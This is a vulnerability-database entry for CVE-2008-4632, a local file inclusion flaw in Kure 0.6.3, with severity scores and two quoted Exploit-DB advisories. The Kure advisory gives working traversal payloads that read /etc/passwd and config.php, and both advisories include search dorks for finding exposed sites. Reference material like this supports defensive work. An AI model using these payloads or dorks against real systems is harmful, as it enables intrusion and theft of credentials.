CVE-2008-4632
published 2008-10-21CVE-2008-4632: Multiple directory traversal vulnerabilities in index.php in Kure 0.6.3, when magic_quotes_gpc is disabled, allow remote attackers to read and possibly execute…
PriorityP334medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.93%
77.4th percentile
Multiple directory traversal vulnerabilities in index.php in Kure 0.6.3, when magic_quotes_gpc is disabled, allow remote attackers to read and possibly execute arbitrary local files via a .. (dot dot) in the (1) post and (2) doc parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kure | kure | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
exploitdb·2010-11-07·CVSS 7.5
CVE-2010-4632 [HIGH] ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
---
# Title: [ASPilot Pilot Cart 7.3 multiple vulnerabilities]
# Date: [07.11.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3]
# CVE Reference: CVE-2008-2688 (only 1 SQL injection)
# EDB-ID: 5765 (only 1 SQL injection)
# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 745/2010
============ { Ariko-Security - Advisory #1/11/2010 } =============
ASPilot Pilot Cart 7.3 multiple vulnerabilities
Vendor's Description of Software and demo:
# http://www.pilotcart.com
Dork:
# Powered by Pilot Cart V.7.3
Application Info:
# Name: Pilot Cart
# version last 7.3
Vulnerability Info:
# Type: multiple SQL injections, multiple XSS, multiple iFrame injections, multiple link injections
Exploit-DB
Kure 0.6.3 - 'index.php' Local File Inclusion
exploitdb·2008-10-16
CVE-2008-4632 Kure 0.6.3 - 'index.php' Local File Inclusion
Kure 0.6.3 - 'index.php' Local File Inclusion
---
# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
# url: http://code.google.com/p/kure/downloads/list
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off
LFI /etc/passwd:
/?post=../../../../../../../../../../../../../etc/passwd%00
/?doc=../../../../../../../../../../../../../etc/passwd%00
LFI /config.php:
/?post=../config.php%00
/?doc=../config.php%00
dork: "powered by kure"
have fun :D
# milw0rm.com [2008-10-16]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4445http://www.securityfocus.com/bid/31785https://exchange.xforce.ibmcloud.com/vulnerabilities/45927https://www.exploit-db.com/exploits/6767http://securityreason.com/securityalert/4445http://www.securityfocus.com/bid/31785https://exchange.xforce.ibmcloud.com/vulnerabilities/45927https://www.exploit-db.com/exploits/6767
2008-10-21
Published